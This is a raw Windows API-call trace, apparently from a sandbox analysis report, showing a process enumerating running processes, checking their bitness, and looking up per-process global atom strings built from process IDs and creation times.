	[0105.390] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0105.390] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0105.390] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.390] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0105.391] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.391] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0105.391] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0105.391] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0105.391] CloseHandle (hObject=0x694) returned 1
	[0105.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0105.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0105.391] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.391] CloseHandle (hObject=0x694) returned 1
	[0105.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0105.391] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.392] CloseHandle (hObject=0x694) returned 1
	[0105.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0105.392] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.392] CloseHandle (hObject=0x694) returned 1
	[0105.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0105.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0105.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0105.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0105.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0105.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0105.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0105.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0105.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0105.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0105.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0105.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0105.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0105.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0105.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0105.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0105.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0105.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0105.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0105.439] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.439] CloseHandle (hObject=0x694) returned 1
	[0105.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0105.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0105.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0105.440] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.440] CloseHandle (hObject=0x694) returned 1
	[0105.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0105.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0105.440] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.440] CloseHandle (hObject=0x694) returned 1
	[0105.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0105.440] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.440] CloseHandle (hObject=0x694) returned 1
	[0105.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0105.440] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.440] CloseHandle (hObject=0x694) returned 1
	[0105.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0105.441] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.441] CloseHandle (hObject=0x694) returned 1
	[0105.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0105.441] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.441] CloseHandle (hObject=0x694) returned 1
	[0105.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0105.441] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.441] CloseHandle (hObject=0x694) returned 1
	[0105.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0105.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0105.441] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.441] CloseHandle (hObject=0x694) returned 1
	[0105.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0105.441] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.442] CloseHandle (hObject=0x694) returned 1
	[0105.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0105.442] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.442] CloseHandle (hObject=0x694) returned 1
	[0105.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0105.442] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.442] CloseHandle (hObject=0x694) returned 1
	[0105.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0105.442] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.442] CloseHandle (hObject=0x694) returned 1
	[0105.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0105.442] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.442] CloseHandle (hObject=0x694) returned 1
	[0105.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0105.443] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.443] CloseHandle (hObject=0x694) returned 1
	[0105.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0105.443] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.443] CloseHandle (hObject=0x694) returned 1
	[0105.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0105.443] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.443] CloseHandle (hObject=0x694) returned 1
	[0105.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0105.443] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.443] CloseHandle (hObject=0x694) returned 1
	[0105.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0105.443] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.443] CloseHandle (hObject=0x694) returned 1
	[0105.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0105.444] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.444] CloseHandle (hObject=0x694) returned 1
	[0105.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0105.444] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.444] CloseHandle (hObject=0x694) returned 1
	[0105.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0105.444] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.444] CloseHandle (hObject=0x694) returned 1
	[0105.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0105.444] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.444] CloseHandle (hObject=0x694) returned 1
	[0105.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0105.445] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.445] CloseHandle (hObject=0x694) returned 1
	[0105.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0105.445] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.445] CloseHandle (hObject=0x694) returned 1
	[0105.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0105.445] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.445] CloseHandle (hObject=0x694) returned 1
	[0105.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0105.445] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.445] CloseHandle (hObject=0x694) returned 1
	[0105.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0105.445] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.445] CloseHandle (hObject=0x694) returned 1
	[0105.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0105.446] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.446] CloseHandle (hObject=0x694) returned 1
	[0105.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0105.446] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.446] CloseHandle (hObject=0x694) returned 1
	[0105.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.446] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.446] CloseHandle (hObject=0x694) returned 1
	[0105.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.446] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.447] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0105.447] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0105.447] wsprintfA (in: param_1=0x3993c40, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0105.447] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.447] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0105.448] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.448] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0105.448] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0105.448] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0105.448] CloseHandle (hObject=0x694) returned 1
	[0105.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0105.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0105.448] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.448] CloseHandle (hObject=0x694) returned 1
	[0105.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0105.448] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.448] CloseHandle (hObject=0x694) returned 1
	[0105.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0105.448] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.449] CloseHandle (hObject=0x694) returned 1
	[0105.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0105.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0105.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0105.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0105.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0105.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0105.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0105.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0105.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0105.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0105.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0105.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0105.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0105.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0105.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0105.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0105.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0105.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0105.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0105.493] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.493] CloseHandle (hObject=0x694) returned 1
	[0105.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0105.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0105.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0105.493] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.493] CloseHandle (hObject=0x694) returned 1
	[0105.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0105.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0105.493] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.493] CloseHandle (hObject=0x694) returned 1
	[0105.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0105.494] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.494] CloseHandle (hObject=0x694) returned 1
	[0105.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0105.494] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.494] CloseHandle (hObject=0x694) returned 1
	[0105.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0105.494] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.494] CloseHandle (hObject=0x694) returned 1
	[0105.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0105.494] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.494] CloseHandle (hObject=0x694) returned 1
	[0105.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0105.494] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.494] CloseHandle (hObject=0x694) returned 1
	[0105.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0105.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0105.495] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.495] CloseHandle (hObject=0x694) returned 1
	[0105.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0105.495] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.495] CloseHandle (hObject=0x694) returned 1
	[0105.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0105.495] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.495] CloseHandle (hObject=0x694) returned 1
	[0105.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0105.495] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.495] CloseHandle (hObject=0x694) returned 1
	[0105.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0105.496] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.496] CloseHandle (hObject=0x694) returned 1
	[0105.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0105.496] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.496] CloseHandle (hObject=0x694) returned 1
	[0105.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0105.496] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.496] CloseHandle (hObject=0x694) returned 1
	[0105.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0105.496] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.496] CloseHandle (hObject=0x694) returned 1
	[0105.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0105.496] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.496] CloseHandle (hObject=0x694) returned 1
	[0105.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0105.497] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.497] CloseHandle (hObject=0x694) returned 1
	[0105.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0105.497] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.497] CloseHandle (hObject=0x694) returned 1
	[0105.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0105.497] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.497] CloseHandle (hObject=0x694) returned 1
	[0105.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0105.497] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.497] CloseHandle (hObject=0x694) returned 1
	[0105.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0105.497] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.498] CloseHandle (hObject=0x694) returned 1
	[0105.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0105.498] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.498] CloseHandle (hObject=0x694) returned 1
	[0105.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0105.498] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.498] CloseHandle (hObject=0x694) returned 1
	[0105.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0105.498] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.498] CloseHandle (hObject=0x694) returned 1
	[0105.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0105.498] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.498] CloseHandle (hObject=0x694) returned 1
	[0105.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0105.499] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.499] CloseHandle (hObject=0x694) returned 1
	[0105.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0105.499] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.499] CloseHandle (hObject=0x694) returned 1
	[0105.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0105.499] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.499] CloseHandle (hObject=0x694) returned 1
	[0105.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0105.499] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.499] CloseHandle (hObject=0x694) returned 1
	[0105.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.499] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.499] CloseHandle (hObject=0x694) returned 1
	[0105.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.500] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.500] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0105.500] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0105.500] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0105.501] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.501] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0105.501] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.501] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0105.501] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0105.501] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0105.501] CloseHandle (hObject=0x694) returned 1
	[0105.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0105.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0105.502] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.502] CloseHandle (hObject=0x694) returned 1
	[0105.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0105.502] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.502] CloseHandle (hObject=0x694) returned 1
	[0105.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0105.502] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.502] CloseHandle (hObject=0x694) returned 1
	[0105.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
